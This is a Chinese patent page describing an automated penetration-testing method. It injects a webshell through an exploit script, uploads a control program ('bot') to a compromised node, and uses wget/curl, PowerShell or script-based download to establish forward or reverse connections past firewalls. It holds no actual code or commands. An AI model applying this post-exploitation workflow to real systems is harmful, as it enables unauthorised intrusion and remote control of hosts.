CN117478721A - Connection method, device, equipment and storage medium for control program - Google Patents
Connection method, device, equipment and storage medium for control program Download PDFInfo
- Publication number
- CN117478721A CN117478721A CN202311837033.7A CN202311837033A CN117478721A CN 117478721 A CN117478721 A CN 117478721A CN 202311837033 A CN202311837033 A CN 202311837033A CN 117478721 A CN117478721 A CN 117478721A
- Authority
- CN
- China
- Prior art keywords
- controlled
- target node
- control program
- operating system
- script
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Granted
Links
- 238000000034 method Methods 0.000 title claims abstract description 49
- 238000012360 testing method Methods 0.000 claims abstract description 27
- 230000009471 action Effects 0.000 claims abstract description 17
- 230000005540 biological transmission Effects 0.000 claims description 3
- 238000012544 monitoring process Methods 0.000 claims description 3
- 230000003044 adaptive effect Effects 0.000 abstract description 2
- 230000007123 defense Effects 0.000 abstract description 2
- 239000003795 chemical substances by application Substances 0.000 description 23
- 238000001514 detection method Methods 0.000 description 11
- 238000004891 communication Methods 0.000 description 10
- 238000004590 computer program Methods 0.000 description 10
- 238000010586 diagram Methods 0.000 description 7
- 230000006870 function Effects 0.000 description 7
- 238000002347 injection Methods 0.000 description 6
- 239000007924 injection Substances 0.000 description 6
- 238000012545 processing Methods 0.000 description 6
- 238000012795 verification Methods 0.000 description 5
- 230000003287 optical effect Effects 0.000 description 3
- 230000003993 interaction Effects 0.000 description 2
- 238000012986 modification Methods 0.000 description 2
- 230000004048 modification Effects 0.000 description 2
- 230000008569 process Effects 0.000 description 2
- 239000000243 solution Substances 0.000 description 2
- 238000003491 array Methods 0.000 description 1
- 238000013473 artificial intelligence Methods 0.000 description 1
- 238000004422 calculation algorithm Methods 0.000 description 1
- 230000001413 cellular effect Effects 0.000 description 1
- 238000013461 design Methods 0.000 description 1
- 238000010801 machine learning Methods 0.000 description 1
- 239000013307 optical fiber Substances 0.000 description 1
- 230000035515 penetration Effects 0.000 description 1
- 239000004065 semiconductor Substances 0.000 description 1
- 230000001953 sensory effect Effects 0.000 description 1
- 238000006467 substitution reaction Methods 0.000 description 1
- 230000000007 visual effect Effects 0.000 description 1
Classifications
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L67/00—Network arrangements or protocols for supporting network services or applications
- H04L67/14—Session management
- H04L67/141—Setup of application sessions
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/02—Network architectures or network communication protocols for network security for separating internal from external traffic, e.g. firewalls
- H04L63/0281—Proxies
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1433—Vulnerability analysis
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L67/00—Network arrangements or protocols for supporting network services or applications
- H04L67/50—Network services
- H04L67/56—Provisioning of proxy services
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L9/00—Cryptographic mechanisms or cryptographic arrangements for secret or secure communications; Network security protocols
- H04L9/40—Network security protocols
Abstract
The embodiment of the disclosure provides a method, a device, equipment and a storage medium for connecting a control program, which are applied to the technical field of attack and defense. The method comprises the steps that a test server obtains a target node to be controlled and a corresponding vulnerability exploitation script in a target network; reading the vulnerability exploitation script to obtain an executable action corresponding to the vulnerability exploitation script; when the vulnerability exploitation script can be successfully injected into the webshell, uploading a control program to a target node to be controlled by using the webshell; and opening the access agent on the target node to be controlled by utilizing the webshell, and establishing connection with the target node to be controlled by utilizing the access agent. In this way, a method of automatically uploading connections by an adaptive control program may be provided to address the connection establishment issues involving firewalls.
Description
Technical Field
The disclosure relates to the technical field of network security, in particular to the technical field of attack and defense, and specifically relates to a control program connection method, a device, equipment and a storage medium.
Background
In the penetration test, the intranet lateral movement attack test is a test that when the next target is successfully attacked, a new node is implanted on the lost target, and then the new node is used for continuously collecting the new target and continuously carrying out the attack. When the vulnerability can be utilized to successfully attack the target and the command can be executed in the intranet lateral movement attack test, a control program needs to be uploaded and connected with the target if the target is to be controlled more comprehensively, so that remote control is performed.
However, when a connection is established, if a firewall problem is involved, for example, if the target has an access control firewall, a problem that the connection cannot be made even if the control program listens to the port for connection occurs, for example, if the target does not go out of the network, a problem that the connection cannot be made even if the control program listens to the port for connection occurs. It can be seen that in a fully automatic scenario, the problem described above, if any, would lead to an explicit possibility of attacking the target, but again for network reasons, would lead to failure of the attack. Therefore, there is a great need to provide a method for automatically uploading connection by an adaptive control program to solve the problem of connection establishment related to the firewall.
Disclosure of Invention
The present disclosure provides a connection method, apparatus, device, and storage medium for a control program.
According to a first aspect of the present disclosure, there is provided a connection method of a control program. The method comprises the following steps:
acquiring a target node to be controlled and a corresponding vulnerability exploitation script in a target network;
reading the vulnerability exploitation script to obtain an executable action corresponding to the vulnerability exploitation script;
when the vulnerability exploitation script can be successfully injected into the webshell, uploading a control program to the target node to be controlled by using the webshell;
and opening an access agent on the target node to be controlled by using the webshell, and establishing connection with the target node to be controlled by using the access agent.
Aspects and any one of the possible implementations as described above, further providing an implementation, the method further including:
when the vulnerability exploitation script cannot be successfully injected into webshell files, determining an operating system, and uploading a control program to the target node to be controlled according to an execution command corresponding to the operating system;
and establishing connection with the target node to be controlled.
In the foregoing aspect and any possible implementation manner, there is further provided an implementation manner, where determining an operating system, and uploading a control program to the target node to be controlled according to an execution command corresponding to the operating system includes:
judging whether an operating system is given;
if the operating system is given, uploading a control program to the target node to be controlled by utilizing an execution command corresponding to the operating system;
if the operating system is not given, judging whether the judgment can be carried out according to the time delay;
if the control program can be judged according to the time delay, judging the system operation by using the time delay of the execution command without the echo, and uploading the control program to the target node to be controlled by using the execution command corresponding to the operating system;
if the control program can not be judged according to the time delay, executing anti-connection guess by using the execution command without the echo display, and uploading the control program to the target node to be controlled by using the execution command corresponding to the operating system.
Aspects and any possible implementation manner as described above, further provide an implementation manner, where the establishing a connection with the target node to be controlled includes:
monitoring a service port of the test server, and determining whether the target node to be controlled can be connected in a reverse connection mode under the condition that the target node to be controlled is connected with the service port of the test server by utilizing the vulnerability exploiting script to execute a control program test command on the target node to be controlled; or,
and under the condition that the vulnerability exploitation script is utilized to execute a control program test command on the target node to be controlled, so that the target node to be controlled monitors a service port of the target node to be controlled, the service port of the target node to be controlled is monitored on the target node to be controlled, and whether the target node to be controlled can be connected in a positive connection mode is determined.
In the foregoing aspect and any possible implementation manner, there is further provided an implementation manner, where uploading the control program to the target node to be controlled according to an execution command corresponding to the operating system includes:
starting an http server, mounting a control program on the http server, and executing a remote downloading command on the target node to be controlled by utilizing an execution command corresponding to an operating system so as to upload the control program to the target node to be controlled.
The aspect and any possible implementation manner as described above further provide an implementation manner, where uploading the control program to the target node to be controlled according to an execution command corresponding to the operating system further includes:
and writing a preset script on the target node to be controlled by using an execution command corresponding to the operating system and running a script downloading command so as to upload a control program to the target node to be controlled.
The aspect and any possible implementation manner as described above further provide an implementation manner, where uploading the control program to the target node to be controlled according to an execution command corresponding to the operating system further includes:
and writing a control program to the target node to be controlled by using an execution command corresponding to the operating system.
According to a second aspect of the present disclosure, there is provided a connection device of a control program. The device comprises:
the acquisition module is used for acquiring a target node to be controlled and a corresponding vulnerability exploitation script in the target network;
the reading module is used for reading the vulnerability exploiting script and obtaining executable actions corresponding to the vulnerability exploiting script;
the transmission module is used for uploading a control program to the target node to be controlled by using the webshell when the vulnerability exploitation script can be successfully injected into the webshell;
and the connection module is used for opening an access agent on the target node to be controlled by utilizing the webshell and establishing connection with the target node to be controlled by utilizing the access agent.
According to a third aspect of the present disclosure, an electronic device is provided. The electronic device includes: a memory and a processor, the memory having stored thereon a computer program, the processor implementing the method as described above when executing the program.
According to a fourth aspect of the present disclosure, there is provided a computer readable storage medium having stored thereon a computer program which when executed by a processor implements a method as described above.
According to the connection method, the device, the equipment and the storage medium of the control program, which are provided by the embodiment of the application, the target node to be controlled and the corresponding vulnerability exploitation script in the target network can be obtained through the test server; reading the vulnerability exploitation script to obtain an executable action corresponding to the vulnerability exploitation script; when the vulnerability exploitation script can be successfully injected into the webshell, uploading a control program to a target node to be controlled by using the webshell; opening an access agent on a target node to be controlled by utilizing the webshell, and establishing connection with the target node to be controlled by utilizing the access agent; based on the method, the control program is uploaded and commanded to the target node to be controlled through executable actions corresponding to the vulnerability exploitation script, namely webshell injection, then the webshell is utilized to open and start an access agent on a service port of the target node to be controlled, so that the control program monitors the service port of the target node to be controlled on the target node to be controlled, and when a connection address is monitored, connection can be established between a test server and the target node to be controlled by utilizing the access agent, and connection of the control program is realized.
It should be understood that what is described in this summary is not intended to limit the critical or essential features of the embodiments of the disclosure nor to limit the scope of the disclosure. Other features of the present disclosure will become apparent from the following description.
Drawings
The above and other features, advantages and aspects of embodiments of the present disclosure will become more apparent by reference to the following detailed description when taken in conjunction with the accompanying drawings. For a better understanding of the present disclosure, and without limiting the disclosure thereto, the same or similar reference numerals denote the same or similar elements, wherein:
FIG. 1 illustrates a schematic diagram of an exemplary operating environment in which embodiments of the present disclosure can be implemented;
FIG. 2 illustrates a flowchart of a method of connection of a control program according to an embodiment of the present disclosure;
FIG. 3 illustrates a flow chart of target system environment detection, network environment detection, control program writing, and establishing a connection according to an embodiment of the present disclosure;
FIG. 4 illustrates a flow chart of target system environment detection, network environment detection, control program writing, and automated bot upload in establishing a connection, according to an embodiment of the present disclosure;
fig. 5 shows a block diagram of a connection device of a control program according to an embodiment of the present disclosure;
fig. 6 illustrates a block diagram of an exemplary electronic device capable of implementing embodiments of the present disclosure.
Detailed Description
For the purposes of making the objects, technical solutions and advantages of the embodiments of the present disclosure more apparent, the technical solutions of the embodiments of the present disclosure will be clearly and completely described below with reference to the accompanying drawings in the embodiments of the present disclosure, and it is apparent that the described embodiments are some embodiments of the present disclosure, but not all embodiments. All other embodiments, which can be made by one of ordinary skill in the art based on the embodiments in this disclosure without inventive faculty, are intended to be within the scope of this disclosure.
In addition, the term "and/or" herein is merely an association relationship describing an association object, and means that three relationships may exist, for example, a and/or B may mean: a exists alone, A and B exist together, and B exists alone. In addition, the character "/" herein generally indicates that the front and rear associated objects are an "or" relationship.
In the disclosure, the control program can be uploaded and commanded to the target node to be controlled by the executable action corresponding to the vulnerability exploitation script, namely webshell injection, then the webshell is utilized to open and open the access agent on the service port of the target node to be controlled, so that the control program monitors the service port of the target node to be controlled on the target node to be controlled, and when the connection address is monitored, the access agent can be utilized to establish connection with the target node to be controlled in the test server, thereby realizing the connection of the control program.
FIG. 1 illustrates a schematic diagram of an exemplary operating environment 100 in which embodiments of the present disclosure can be implemented. Included in the operating environment 100 are a test server 102 and a target network 104.
The test server 102 includes a management terminal admin and a primary node agent0. The management terminal admin scans the network and can select any node as the primary node agent0, and then uses the primary node agent0 to scan the vulnerability information of the target network 104, so as to obtain the node with the available vulnerability in the target network 104, namely the target node agent1 to be controlled.
When the primary node agent0 finds the target node agent1 to be controlled through scanning, it can perform the exploit execution command on the target node agent1 to be controlled. However, at this time, the primary node agent0 is not aware of any network situation, such as the system environment and network environment of the target node to be controlled, is only aware of the service port that can be connected to the target node agent1 to be controlled, and can execute the command using the service port. Based on this, if it is clear that the target node agent1 to be controlled can be attacked, but the network situation is not clear, it is necessary to perform target system environment detection, network environment detection and control program writing based on the current running environment 100, and establish connection between the target node agent1 to be controlled and the primary node agent0 according to the network environment limitation, so as to complete automatic uploading and connection of the control program.
Fig. 2 shows a flowchart of a connection method 200 of a control program according to an embodiment of the present disclosure. The method 200 may be performed by the test server 102 in fig. 1.
At block 210, a target node to be controlled in a target network and a corresponding exploit script are obtained.
In some embodiments, agent0 obtains an agent and a corresponding exploit script exp in the target network. The exp is an exp called by an exp module in the agent0, namely an utilization script of a corresponding vulnerability loaded by the exp module, and the exp module is a module for attacking a target node to be controlled.
At block 220, the exploit script is read, resulting in an executable action corresponding to the exploit script.
In some embodiments, agent0 reads information in exp, obtains exp executable actions and restrictions.
In some embodiments, exp executable actions may include webshell injection, and may also include execution commands. The webshell can upload a preset script to a target server aiming at an http service, so that the preset script can also provide the http service externally, and further file uploading and command control can be performed by using the service provided by the script.
In some embodiments, the restrictions may also include whether there is a echo, whether remote loading is required, and whether latency can be achieved.
At block 230, when the exploit script is able to successfully inject the webshell, the webshell is used to upload the control program to the target node to be controlled.
In some embodiments, agent0 may call the webshell injection function in exp to attempt to write a webshell file, so that the webshell may upload the control program bot to the target node to be controlled.
When the exploit script can be successfully injected into the webshell, the agent0 can use the webshell to acquire the basic information of the target node to be controlled. Because the target service of the target node to be controlled is directly utilized, the network at this time must be smooth, and the bot can be uploaded and executed by using the file upload function.
It should be noted that, at this time, the target system environment detection, the network environment detection, and the control program writing are completed, and then the agent1 and the agent0 can be connected according to the network environment limitation, so as to complete the automatic uploading and connection of the bot, i.e. the bot availability verification.
At block 240, the access agent is opened on the target node to be controlled using the webshell, and a connection is established with the target node to be controlled using the access agent.
In some embodiments, a test module is self-contained on the bot, which is used to test the network connectivity of agent1 and agent0.
It should be noted that the above-mentioned tested network environment results are not multiplexed at this time, because the above-mentioned network environment results may be interfered by the corresponding program, for example, the firewall may automatically release the flow request of the known program.
Thus, when a webshell is implanted in agent1, agent0 can open an access agent on agent1 using the webshell, then the bot can listen to a local address, such as 127.0.0.1, on agent1, and then agent0 can connect into agent1 using the access agent. Here, the access agent is directly opened on the service port of agent1, so agent0 can certainly access.
According to the embodiment of the disclosure, when an access control firewall exists in a target, for example, a problem that even if a control program monitors a port for connection, connection cannot be achieved at the moment occurs, under a full-automatic scene, a target node to be controlled and a corresponding exploit script in a target network are obtained through a test server, then the exploit script is read, executable actions corresponding to the exploit script are obtained, when the exploit script can be successfully injected into a webshell, the control program is uploaded to the target node to be controlled by using the webshell, an access agent is opened on the target node to be controlled by using the webshell, and connection is established between the access agent and the target node to be controlled; based on the method, the control program is uploaded and commanded to the target node to be controlled through executable actions corresponding to the vulnerability exploitation script, namely webshell injection, then the webshell is utilized to open and start an access agent on a service port of the target node to be controlled, so that the control program monitors the service port of the target node to be controlled on the target node to be controlled, and when a connection address is monitored, connection can be established between a test server and the target node to be controlled by utilizing the access agent, and connection of the control program is realized.
In some embodiments, the above method further comprises:
when the exploit script cannot be successfully injected into the webshell file, determining an operating system, and uploading a control program to a target node to be controlled according to an execution command corresponding to the operating system;
and establishing connection with the target node to be controlled.
In some embodiments, when the exploit script cannot successfully inject the webshell file, indicating that writing of the bot cannot be performed through the webshell currently, the writing of the bot may be performed by using a command execution mode.
In some embodiments, when writing a bot by using a command execution mode, it is necessary to determine an operating system first, and then execute a corresponding command according to a different operating system.
According to the embodiment of the disclosure, the control program is uploaded to the target node to be controlled according to the execution command corresponding to the operating system, and the connection is established with the target node to be controlled, so that the bot writing can be performed in a targeted manner according to the characteristics of each operating system by using the corresponding command execution mode, and more choices are provided for the user.
In some embodiments, the determining the operating system, and uploading the control program to the target node to be controlled according to the execution command corresponding to the operating system includes:
judging whether an operating system is given;
if the operating system is given, uploading the control program to the target node to be controlled by utilizing an execution command corresponding to the operating system;
if the operating system is not given, judging whether the judgment can be carried out according to the time delay;
if the control program can be judged according to the time delay, judging the system operation by using the time delay of the execution command without the echo, and uploading the control program to the target node to be controlled by using the execution command corresponding to the operating system;
if the control program can not be judged according to the time delay, executing anti-connection guess by using the execution command without the echo display, and uploading the control program to the target node to be controlled by using the execution command corresponding to the operating system.
In some embodiments, if the operating system cannot be determined currently, the operating system may be determined based on the exp limitation, that is, whether there is a callback, whether remote loading is required, and whether time delay is possible, so that the control program is uploaded to the target node to be controlled by using an execution command corresponding to the operating system.
According to the embodiment of the disclosure, the operating system can be judged under the condition that the operating system cannot be determined, so that uploading of the control program to the target node to be controlled by using the corresponding execution command of the operating system is further completed.
In some embodiments, the establishing a connection with the target node to be controlled includes:
monitoring a service port of a test server, and determining whether the target node to be controlled can be connected in a reverse connection mode under the condition that the target node to be controlled is connected with the service port of the test server by utilizing the vulnerability exploiting script to execute a control program test command on the target node to be controlled; or,
and under the condition that the vulnerability exploitation script is utilized to execute a control program test command on the target node to be controlled, so that the target node to be controlled monitors the service port of the target node to be controlled, the service port of the target node to be controlled is monitored on the target node to be controlled is connected, and whether the target node to be controlled can be connected in a positive connection mode is determined.
In some embodiments, when uploading the bot to the agent1 by using an execution command corresponding to the operating system, the port of the host may be monitored on the host, that is, the agent0 first, and then the test command of the bot is executed on the victim, that is, the agent1, by using exp, where the victim is connected to the agent0 and the port of the host monitored on the host, so that it may be known whether the agent1 may be connected to the agent0 by way of anti-connection.
In some embodiments, when uploading the bot to the agent1 by using an execution command corresponding to the operating system, the victim may also monitor the port of the victim by using the exp to execute the test command of the bot on the victim, and then use the agent0 to connect the port of the victim monitored by the victim, so as to know whether the victim can be connected to the bot by way of forward connection.
According to the embodiment of the disclosure, the specific implementation manner of uploading the bot to the agent1 by using the execution command corresponding to the operating system can be provided in the above manner, so that the uploading of the control program to the target node to be controlled by using the execution command corresponding to the operating system is further completed.
In some embodiments, the uploading the control program to the target node to be controlled according to the execution command corresponding to the operating system includes:
starting an http server, mounting a control program on the http server, and executing a remote downloading command on the target node to be controlled by utilizing an execution command corresponding to the operating system so as to upload the control program to the target node to be controlled.
In some embodiments, the uploading the control program to the target node to be controlled according to the execution command corresponding to the operating system further includes:
and writing a preset script on the target node to be controlled by using an execution command corresponding to the operating system and running a script downloading command so as to upload the control program to the target node to be controlled.
In some embodiments, the uploading the control program to the target node to be controlled according to the execution command corresponding to the operating system further includes:
and writing a control program to the target node to be controlled by using an execution command corresponding to the operating system.
In some embodiments, an http server may be started on agent0 to mount a bot on the server, and then two remote download commands, such as a wget and a curl command, are executed on the exp agent1 in succession for downloading. The two purposes of this are that one can detect if there are two programs on agent1, and the other can detect if agent1 is out of the web. If the http server of agent0 receives the connection, it indicates that there is a corresponding download command on agent1 and that the connection to agent0 can be made out of the web, and at this time the bot has been uploaded, connection detection, i.e., bot availability verification, can be made.
In some embodiments, if the http server on agent0 does not receive the connection, it may not go out of the network, or there may be no corresponding command, at which point the probing may continue using the script. For example, if under Linux operating system, a shell script may be written into agent1 and then the script is run for downloading, if under Windows operating system, the powershell may be used for downloading, and if the reverse connection is successfully received, it is indicated that the target goes out of the network, and connection detection may be performed.
It should be noted that, because there are many steps to write the script in Linux, the script in Windows powershell is not necessarily authorized to be executed, and if the user has the above consideration, the user may avoid the manner of initially writing the preset script in the agent1 by using the execution command corresponding to the operating system and running the script download command to upload the bot to the agent1.
In some embodiments, if the http server on agent0 still does not receive the connection, it is indicated that agent1 is most likely not out of the network, or that no script command is available, and an attempt may be made to use the command to actively echo to output in, and connection detection may be performed after the output is completed. However, it should be noted that attempting to use the command active echo output in a manner is slow.
It should be noted that, whether the control program is uploaded to the target node to be controlled according to the execution command corresponding to the operating system, that is, whether the execution command corresponding to the operating system is selected to directly use to execute the remote download command on the agent1, the execution command corresponding to the operating system is selected to use to write the preset script on the agent1 and run the script download command, or the execution command corresponding to the operating system is selected to use echo to write the bot to the agent1 to write the bot, or the execution command can be selected according to the actual requirement of the user, or the execution command can be selected according to the preset rule, which is not limited herein.
According to the embodiment of the disclosure, different implementations of uploading the control program to the target node to be controlled according to the execution command corresponding to the operating system can be provided through the above-mentioned process, so that more choices are provided for the user.
Referring to fig. 3 and 4, another method of connecting control programs is provided.
In some embodiments, agent0 obtains an agent and a corresponding exp in the target network, reads information in the exp, and obtains exp executable actions and restrictions, where the executable actions include webshell injection and execution commands, and the restrictions include whether there is a echo, whether remote loading is required, and whether latency is possible. Wherein the restrictions are used to determine the operating system.
When the webshell can be successfully injected by utilizing exp, the webshell is used for acquiring the basic information of the agent1, and the uploading function of the file is used for uploading the bot to the agent1 and executing the bot so as to judge the network environment. When webshell cannot be successfully injected by exp, a command execution mode, that is, a function uploading by using a command, can be used. Before uploading by using the command execution function, the operating system is judged to execute the corresponding command according to the unused operating system.
The judging operation system comprises: judging whether an operating system is given, if the operating system is given, carrying out automatic bot uploading according to an unused operating system, if the operating system is not given, judging whether the operating system can be judged according to time delay, if the operating system can be judged according to time delay, judging the operating system by using a loop-back-display-free execution command time delay, and if the operating system can not be judged according to time delay, executing a loop-back-display-free execution command to guess the operating system.
Automated bot upload includes: the known operating system comprises a Windows operating system and a Linux operating system, httpserver is started on the agent0 to carry out the wgget and the curl test, whether the agent0 receives the back connection is judged, if the agent0 can not receive the back connection, the bot availability verification is carried out under the respective operating system, if the agent0 can not receive the back connection, i.e. no command is executed or the agent1 is not out of the network, the powershell download is carried out under the Windows operating system, the shell script remote download is carried out under the Linux operating system, then the judgment is continued whether the agent0 receives the back connection, if the agent0 can receive the back connection, the bot availability verification is carried out under the respective operating system, if the agent0 can not receive the back connection, the fact that the agent1 is out of the network can not be determined, the active writing is needed, then the echo writing is carried out under the respective operating system, and then the bot availability verification is carried out under the respective operating system.
According to the embodiment of the disclosure, through the method, the network environment and the limitation between the agent0 and the bot can be obtained, so that a user can select an optimal connection mode according to the result of connectivity, coordinate the agent0 to perform corresponding operation to start the monitor or actively connect the bot, and therefore the purpose of selecting an appropriate connection mode according to the actual network environment communication condition is achieved, and communication with the bot is ensured.
It should be noted that, for simplicity of description, the foregoing method embodiments are all described as a series of acts, but it should be understood by those skilled in the art that the present disclosure is not limited by the order of acts described, as some steps may be performed in other orders or concurrently in accordance with the present disclosure. Further, those skilled in the art will also appreciate that the embodiments described in the specification are all alternative embodiments, and that the acts and modules referred to are not necessarily required by the present disclosure.
The foregoing is a description of embodiments of the method, and the following further describes embodiments of the present disclosure through examples of apparatus.
Fig. 5 shows a block diagram of a connection device 500 of a control program according to an embodiment of the present disclosure. The apparatus 500 may be included in the test server 102 of fig. 1 or implemented as the test server 102. As shown in fig. 5, the apparatus 500 includes:
an obtaining module 510, configured to obtain a target node to be controlled and a corresponding exploit script in a target network;
the reading module 520 is configured to read the exploit script, and obtain an executable action corresponding to the exploit script;
a transmission module 530, configured to, when the vulnerability exploiting script can be successfully injected into the webshell, upload the control program to the target node to be controlled by using the webshell;
the connection module 540 is configured to open an access agent on the target node to be controlled by using the webshell, and establish a connection with the target node to be controlled by using the access agent.
It will be clear to those skilled in the art that, for convenience and brevity of description, specific working procedures of the described modules may refer to corresponding procedures in the foregoing method embodiments, which are not described herein again.
In the technical scheme of the disclosure, the acquisition, storage, application and the like of the related user personal information all conform to the regulations of related laws and regulations, and the public sequence is not violated.
According to embodiments of the present disclosure, the present disclosure also provides an electronic device, a readable storage medium and a computer program product.
Fig. 6 illustrates a block diagram of an exemplary electronic device 600 capable of implementing embodiments of the present disclosure. Electronic devices are intended to represent various forms of digital computers, such as laptops, desktops, workstations, personal digital assistants, servers, blade servers, mainframes, and other appropriate computers. The electronic device may also represent various forms of mobile devices, such as personal digital processing, cellular telephones, smartphones, wearable devices, and other similar computing devices. The components shown herein, their connections and relationships, and their functions, are meant to be exemplary only, and are not meant to limit implementations of the disclosure described and/or claimed herein.
The electronic device 600 includes a computing unit 601 that can perform various appropriate actions and processes according to a computer program stored in a ROM602 or a computer program loaded from a storage unit 608 into a RAM 603. In the RAM603, various programs and data required for the operation of the electronic device 600 can also be stored. The computing unit 601, ROM602, and RAM603 are connected to each other by a bus 604. An I/O interface 605 is also connected to bus 604.
A number of components in the electronic device 600 are connected to the I/O interface 605, including: an input unit 606 such as a keyboard, mouse, etc.; an output unit 607 such as various types of displays, speakers, and the like; a storage unit 608, such as a magnetic disk, optical disk, or the like; and a communication unit 609 such as a network card, modem, wireless communication transceiver, etc. The communication unit 609 allows the electronic device 600 to exchange information/data with other devices through a computer network, such as the internet, and/or various telecommunication networks.
The computing unit 601 may be a variety of general and/or special purpose processing components having processing and computing capabilities. Some examples of computing unit 601 include, but are not limited to, a Central Processing Unit (CPU), a Graphics Processing Unit (GPU), various specialized Artificial Intelligence (AI) computing chips, various computing units running machine learning model algorithms, a Digital Signal Processor (DSP), and any suitable processor, controller, microcontroller, etc. The computing unit 601 performs the various methods and processes described above, such as method 200. For example, in some embodiments, the method 200 may be implemented as a computer software program tangibly embodied on a machine-readable medium, such as the storage unit 608.
In some embodiments, part or all of the computer program may be loaded and/or installed onto the electronic device 600 via the ROM602 and/or the communication unit 609. One or more of the steps of the method 200 described above may be performed when a computer program is loaded into RAM603 and executed by the computing unit 601. Alternatively, in other embodiments, computing unit 601 may be configured to perform method 200 by any other suitable means (e.g., by means of firmware).
Various implementations of the systems and techniques described here above may be implemented in digital electronic circuitry, integrated circuit systems, field Programmable Gate Arrays (FPGAs), application Specific Integrated Circuits (ASICs), application Specific Standard Products (ASSPs), systems On Chip (SOCs), load programmable logic devices (CPLDs), computer hardware, firmware, software, and/or combinations thereof. These various embodiments may include: implemented in one or more computer programs, the one or more computer programs may be executed and/or interpreted on a programmable system including at least one programmable processor, which may be a special purpose or general-purpose programmable processor, that may receive data and instructions from, and transmit data and instructions to, a storage system, at least one input device, and at least one output device.
Program code for carrying out methods of the present disclosure may be written in any combination of one or more programming languages. These program code may be provided to a processor or controller of a general purpose computer, special purpose computer, or other programmable data processing apparatus such that the program code, when executed by the processor or controller, causes the functions/operations specified in the flowchart and/or block diagram to be implemented. The program code may execute entirely on the machine, partly on the machine, as a stand-alone software package, partly on the machine and partly on a remote machine or entirely on the remote machine or server.
In the context of this disclosure, a machine-readable medium may be a tangible medium that can contain, or store a program for use by or in connection with an instruction execution system, apparatus, or device. The machine-readable medium may be a machine-readable signal medium or a machine-readable storage medium. The machine-readable medium may include, but is not limited to, an electronic, magnetic, optical, electromagnetic, infrared, or semiconductor system, apparatus, or device, or any suitable combination of the foregoing. More specific examples of a machine-readable storage medium would include an electrical connection based on one or more wires, a portable computer diskette, a hard disk, a Random Access Memory (RAM), a read-only memory (ROM), an erasable programmable read-only memory (EPROM or flash memory), an optical fiber, a portable compact disc read-only memory (CD-ROM), an optical storage device, a magnetic storage device, or any suitable combination of the foregoing.
To provide for interaction with a user, the systems and techniques described here can be implemented on a computer having: display means for displaying information to a user; and a keyboard and pointing device (e.g., a mouse or trackball) by which a user can provide input to the computer. Other kinds of devices may also be used to provide for interaction with a user; for example, feedback provided to the user may be any form of sensory feedback (e.g., visual feedback, auditory feedback, or tactile feedback); and input from the user may be received in any form, including acoustic input, speech input, or tactile input.
The systems and techniques described here can be implemented in a computing system that includes a background component (e.g., as a data server), or that includes a middleware component (e.g., an application server), or that includes a front-end component (e.g., a user computer having a graphical user interface or a web browser through which a user can interact with an implementation of the systems and techniques described here), or any combination of such background, middleware, or front-end components. The components of the system can be interconnected by any form or medium of digital data communication (e.g., a communication network). Examples of communication networks include: local Area Networks (LANs), wide Area Networks (WANs), and the internet.
The computer system may include a client and a server. The client and server are typically remote from each other and typically interact through a communication network. The relationship of client and server arises by virtue of computer programs running on the respective computers and having a client-server relationship to each other. The server may be a cloud server, a server of a distributed system, or a server incorporating a blockchain.
It should be appreciated that various forms of the flows shown above may be used to reorder, add, or delete steps. For example, the steps recited in the present disclosure may be performed in parallel, sequentially, or in a different order, provided that the desired results of the disclosed aspects are achieved, and are not limited herein.
The above detailed description should not be taken as limiting the scope of the present disclosure. It will be apparent to those skilled in the art that various modifications, combinations, sub-combinations and alternatives are possible, depending on design requirements and other factors. Any modifications, equivalent substitutions and improvements made within the spirit and principles of the present disclosure are intended to be included within the scope of the present disclosure.
Claims (10)
1. A method for connecting a control program, applied to a test server, comprising:
acquiring a target node to be controlled and a corresponding vulnerability exploitation script in a target network;
reading the vulnerability exploitation script to obtain an executable action corresponding to the vulnerability exploitation script;
when the vulnerability exploitation script can be successfully injected into the webshell, uploading a control program to the target node to be controlled by using the webshell;
and opening an access agent on the target node to be controlled by using the webshell, and establishing connection with the target node to be controlled by using the access agent.
2. The method according to claim 1, wherein the method further comprises:
when the vulnerability exploitation script cannot be successfully injected into webshell files, determining an operating system, and uploading a control program to the target node to be controlled according to an execution command corresponding to the operating system;
and establishing connection with the target node to be controlled.
3. The method according to claim 2, wherein determining the operating system, and uploading the control program to the target node to be controlled according to the execution command corresponding to the operating system, comprises:
judging whether an operating system is given;
if the operating system is given, uploading a control program to the target node to be controlled by utilizing an execution command corresponding to the operating system;
if the operating system is not given, judging whether the judgment can be carried out according to the time delay;
if the control program can be judged according to the time delay, judging the system operation by using the time delay of the execution command without the echo, and uploading the control program to the target node to be controlled by using the execution command corresponding to the operating system;
if the control program can not be judged according to the time delay, executing anti-connection guess by using the execution command without the echo display, and uploading the control program to the target node to be controlled by using the execution command corresponding to the operating system.
4. The method according to claim 2, wherein said establishing a connection with said target node to be controlled comprises:
monitoring a service port of the test server, and determining whether the target node to be controlled can be connected in a reverse connection mode under the condition that the target node to be controlled is connected with the service port of the test server by utilizing the vulnerability exploiting script to execute a control program test command on the target node to be controlled; or,
and under the condition that the vulnerability exploitation script is utilized to execute a control program test command on the target node to be controlled, so that the target node to be controlled monitors a service port of the target node to be controlled, the service port of the target node to be controlled is monitored on the target node to be controlled, and whether the target node to be controlled can be connected in a positive connection mode is determined.
5. The method according to claim 2, wherein the uploading the control program to the target node to be controlled according to the execution command corresponding to the operating system includes:
